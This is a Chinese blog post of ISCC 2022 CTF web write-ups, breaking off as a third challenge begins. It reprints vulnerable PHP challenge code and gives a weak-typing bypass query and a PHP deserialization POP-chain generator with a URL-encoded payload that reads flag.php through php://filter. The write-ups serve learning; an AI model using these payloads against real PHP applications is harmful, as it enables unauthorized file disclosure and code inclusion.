<!DOCTYPE HTML>
<html lang="zh-Hans">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="ISCC 2022, 一个Hexo博客">
    <meta name="description" content="
web冬奥会1234567891011121314151617181920212223242526272829303132&amp;lt;?phpshow_source(__FILE__);$Step1=False;$Step2=False;$i">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>ISCC 2022 | 一个Hexo博客</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.0.0"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">一个Hexo博客</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>Index</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>Tags</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>Categories</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>Archives</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>About</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>Contact</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>Friends</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="Search" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">一个Hexo博客</div>
        <div class="logo-desc">
            
            宠辱不惊，看庭前花开花落；去留无意，望天上云卷云舒--------------《小窗幽记》
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			Index
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			Tags
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			Categories
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			Archives
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			About
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			Contact
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			Friends
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/4.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">ISCC 2022</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                          <div class="article-tag">
                            <span class="chip bg-color">No tag</span>
                          </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>Publish Date:&nbsp;&nbsp;
                    2022-06-11
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <hr>
<h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><h2 id="冬奥会"><a href="#冬奥会" class="headerlink" title="冬奥会"></a>冬奥会</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$Step1</span>=<span class="literal">False</span>;</span><br><span class="line"><span class="variable">$Step2</span>=<span class="literal">False</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$info</span>=(<span class="keyword">array</span>)json_decode(@<span class="variable">$_GET</span>[<span class="string">&#x27;Information&#x27;</span>]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(is_array(<span class="variable">$info</span>))&#123;</span><br><span class="line"></span><br><span class="line">    var_dump(<span class="variable">$info</span>);</span><br><span class="line"></span><br><span class="line">    is_numeric(@<span class="variable">$info</span>[<span class="string">&quot;year&quot;</span>])?<span class="keyword">die</span>(<span class="string">&quot;Sorry~&quot;</span>):<span class="literal">NULL</span>;<span class="comment">//不能为纯数字</span></span><br><span class="line">    <span class="keyword">if</span>(@<span class="variable">$info</span>[<span class="string">&quot;year&quot;</span>])&#123;</span><br><span class="line">        (<span class="variable">$info</span>[<span class="string">&quot;year&quot;</span>]=<span class="number">2022</span>)?<span class="variable">$Step1</span>=<span class="literal">True</span>:<span class="literal">NULL</span>;<span class="comment">//数字部分为2022</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(is_array(@<span class="variable">$info</span>[<span class="string">&quot;items&quot;</span>]))&#123;</span><br><span class="line">        <span class="keyword">if</span>(!is_array(<span class="variable">$info</span>[<span class="string">&quot;items&quot;</span>][<span class="number">1</span>])<span class="keyword">OR</span> count(<span class="variable">$info</span>[<span class="string">&quot;items&quot;</span>])!==<span class="number">3</span> ) <span class="keyword">die</span>(<span class="string">&quot;Sorry~&quot;</span>);<span class="comment">//其是一个长度为3的数组，里边第一个元素是数组</span></span><br><span class="line">        <span class="variable">$status</span> = array_search(<span class="string">&quot;skiing&quot;</span>, <span class="variable">$info</span>[<span class="string">&quot;items&quot;</span>]);</span><br><span class="line">        <span class="variable">$status</span>===<span class="literal">false</span>?<span class="keyword">die</span>(<span class="string">&quot;Sorry~&quot;</span>):<span class="literal">NULL</span>;</span><br><span class="line">        <span class="keyword">foreach</span>(<span class="variable">$info</span>[<span class="string">&quot;items&quot;</span>] <span class="keyword">as</span> <span class="variable">$key</span>=&gt;<span class="variable">$val</span>)&#123;</span><br><span class="line">            <span class="variable">$val</span>===<span class="string">&quot;skiing&quot;</span>?<span class="keyword">die</span>(<span class="string">&quot;Sorry~&quot;</span>):<span class="literal">NULL</span>;<span class="comment">//val!==&quot;skiing&quot;</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$Step2</span>=<span class="literal">True</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$Step1</span> &amp;&amp; <span class="variable">$Step2</span>)&#123;</span><br><span class="line">    <span class="keyword">include</span> <span class="string">&quot;2022flag.php&quot;</span>;<span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p><strong>步骤：</strong><br>现对于这段代码进行分析。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">json_decode接受一个JSON格式的字符串并且把它转换为PHP变量 ,</span><br><span class="line">JSON 格式的字符串 <span class="variable">$json</span> = <span class="string">&#x27;&#123;&quot;a&quot;:&quot;php&quot;,&quot;b&quot;:&quot;mysql&quot;,&quot;c&quot;:3&#125;&#x27;</span>;</span><br></pre></td></tr></table></figure>
<p>首先可得，我们需要get一个字符串。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">is_array是一个函数，若变量为数组类型则返回<span class="literal">true</span>，否则返回<span class="literal">false</span></span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">is_numeric() — 检测变量是否为数字或数字字符串，是数字和数字字符串则返回 <span class="literal">TRUE</span>，否则返回 <span class="literal">FALSE</span></span><br></pre></td></tr></table></figure>
<p>要求里边元素第一个不能是纯数字,</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">die</span>() 函数输出一条消息，并退出当前脚本</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">array_search() 函数与 in_array() 一样，在数组中查找一个键值。</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">“@” 来抑制错误信息</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span> <span class="keyword">as</span>”是一个循环语句，用于遍历数组，语法为“<span class="keyword">foreach</span> (<span class="variable">$array</span> <span class="keyword">as</span> <span class="variable">$value</span>) &#123;要执行代码;&#125;”，每进行一次循环，当前数组元素的值就会被赋值给<span class="variable">$value</span>变量。</span><br></pre></td></tr></table></figure>
<p>从而可得：?Information={“year”:”2022a”,”items”:[0,[1],2]}</p>
<p><strong>解题收获：</strong></p>
<blockquote>
<p>有一个点：2022a<br>PHP提供了is_numeric函数，用来变量判断是否为数字。PHP弱类型语言的一个特性，当一个整形和一个其他类型行比较的时候，会先把其他类型intval数字化再比,<br>intval() 函数用于获取变量的整数值,从而使得…2022a=2022</p>
</blockquote>
<h2 id="pop"><a href="#pop" class="headerlink" title="pop"></a>pop</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">Happy <span class="keyword">New</span> Year~ MAKE A WISH</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;Happy New Year~ MAKE A WISH&lt;br&gt;&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;wish&#x27;</span>]))&#123;</span><br><span class="line">    @unserialize(<span class="variable">$_GET</span>[<span class="string">&#x27;wish&#x27;</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="variable">$a</span>=<span class="keyword">new</span> Road_is_Long;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">/***************************pop your 2022*****************************/</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Road_is_Long</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$page</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$string</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$file</span>=<span class="string">&#x27;index.php&#x27;</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;page = <span class="variable">$file</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;string-&gt;page;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&quot;/file|ftp|http|https|gopher|dict|\.\./i&quot;</span>, <span class="keyword">$this</span>-&gt;page)) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;You can Not Enter 2022&quot;</span>;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;page = <span class="string">&quot;index.php&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span>  </span>&#123;</span><br><span class="line">    <span class="keyword">protected</span>  <span class="variable">$var</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">append</span>(<span class="params"><span class="variable">$value</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$value</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;append(<span class="keyword">$this</span>-&gt;var);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Make_a_Change</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$effort</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;effort = <span class="keyword">array</span>();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$key</span></span>)</span>&#123;</span><br><span class="line">        <span class="variable">$function</span> = <span class="keyword">$this</span>-&gt;effort;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$function</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">/**********************Try to See flag.php*****************************/</span></span><br></pre></td></tr></table></figure>
<p><strong>解题收获：（对于未知函数进行分析）</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">highlight_file函数用于对文件进行PHP语法高亮显示</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">isset</span>() 函数用于检测变量是否已设置并且非 <span class="literal">NULL</span>。</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">unserialize() 函数用于将通过 serialize() 函数序列化后的对象或数组进行反序列化，并返回原始的对象结构。</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params">参数列表</span>)允许在实例化一个类之前先执行构造方法。</span></span><br><span class="line"><span class="function">构造函数就是当对象被创建时，类中被自动调用的第一个函数，并且一个类中只能存在一个构造函数。和普通函数类似构造函数也可以带有参数，如果构造函数有参数的话，那么在实例化也需要传入对应的参数，</span></span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__toString()，类被当成字符串时的回应方法，此方法必须返回一个字符串，否则将发出一条 `E_RECOVERABLE_ERROR` 级别的致命错误。</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__wakeup()当使用 unserialize() 反序列化一个对象成功后，会自动调用该对象的 __wakup() 魔术方法，该魔术方法既没有参数，也没有返回值。调用到__toString()</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">_invoke()，调用函数的方式调用一个对象时的回应方法</span><br><span class="line">当尝试以调用函数的方式调用一个对象时，__invoke() 方法会被自动调用。</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__construct() 每次实例化一个类都会先调用该方法进行初始化。</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__get() 魔术方法的使用。读取不可访问属性的值时，__get() 会被调用。</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">preg_match 函数用于执行一个正则表达式匹配（可以完成字符串的规则匹配）</span><br></pre></td></tr></table></figure>

<p><strong>步骤：</strong></p>
<blockquote>
<p>进一步，对于代码顺序进行梳理<br> unserialize() 反序列化一个对象成功后，自动调用该对象的 __wakup() 魔术方法，（ <code>$this-&gt;page = &quot;index.php&quot;</code>）一个的对象当作字符串调用到__toString()，<br>  我们最后要得到include($value);从而要输入不可访问属性的值调用__get()，</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/290f34dc88f240b6a75f9759823933ed.png" alt="在这里插入图片描述"><br>首先对于此插件进行进一步使用。<br>编写运行可得：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Road_is_Long</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$page</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$string</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$file</span></span>)</span>&#123;<span class="comment">//($file=&#x27;index.php&#x27;)</span></span><br><span class="line">        <span class="keyword">$this</span>-&gt;page = <span class="variable">$file</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;aaa&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Try_Work_Hard</span> </span>&#123;</span><br><span class="line">    <span class="keyword">protected</span>  <span class="variable">$var</span>=<span class="string">&#x27;php://filter/read=convert.base64-encode/resource=flag.php&#x27;</span> ;<span class="comment">//代码最末尾提示flag.php</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Make_a_Change</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$effort</span>;</span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> Road_is_Long(<span class="string">&#x27;flag&#x27;</span>);</span><br><span class="line"><span class="variable">$a</span>-&gt;string = <span class="keyword">new</span> Make_a_Change();</span><br><span class="line"><span class="variable">$a</span>-&gt;string-&gt;effort = <span class="keyword">new</span> Try_Work_Hard();</span><br><span class="line"><span class="variable">$b</span> = <span class="keyword">new</span> Road_is_Long(<span class="variable">$a</span>);</span><br><span class="line"><span class="keyword">echo</span> urlencode(serialize(<span class="variable">$b</span>));<span class="comment">//题上有unserialize</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>从而可得：wish=O%3A12%3A”Road_is_Long”%3A2%3A%7Bs%3A4%3A”page”%3BO%3A12%3A”Road_is_Long”%3A2%3A%7Bs%3A4%3A”page”%3Bs%3A3%3A”aaa”%3Bs%3A6%3A”string”%3BO%3A13%3A”Make_a_Change”%3A1%3A%7Bs%3A6%3A”effort”%3BO%3A13%3A”Try_Work_Hard”%3A1%3A%7Bs%3A6%3A”%00%2A%00var”%3Bs%3A57%3A”php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php”%3B%7D%7D%7Ds%3A6%3A”string”%3BN%3B%7D</p>
<h2 id="findme"><a href="#findme" class="headerlink" title="findme"></a>findme</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td 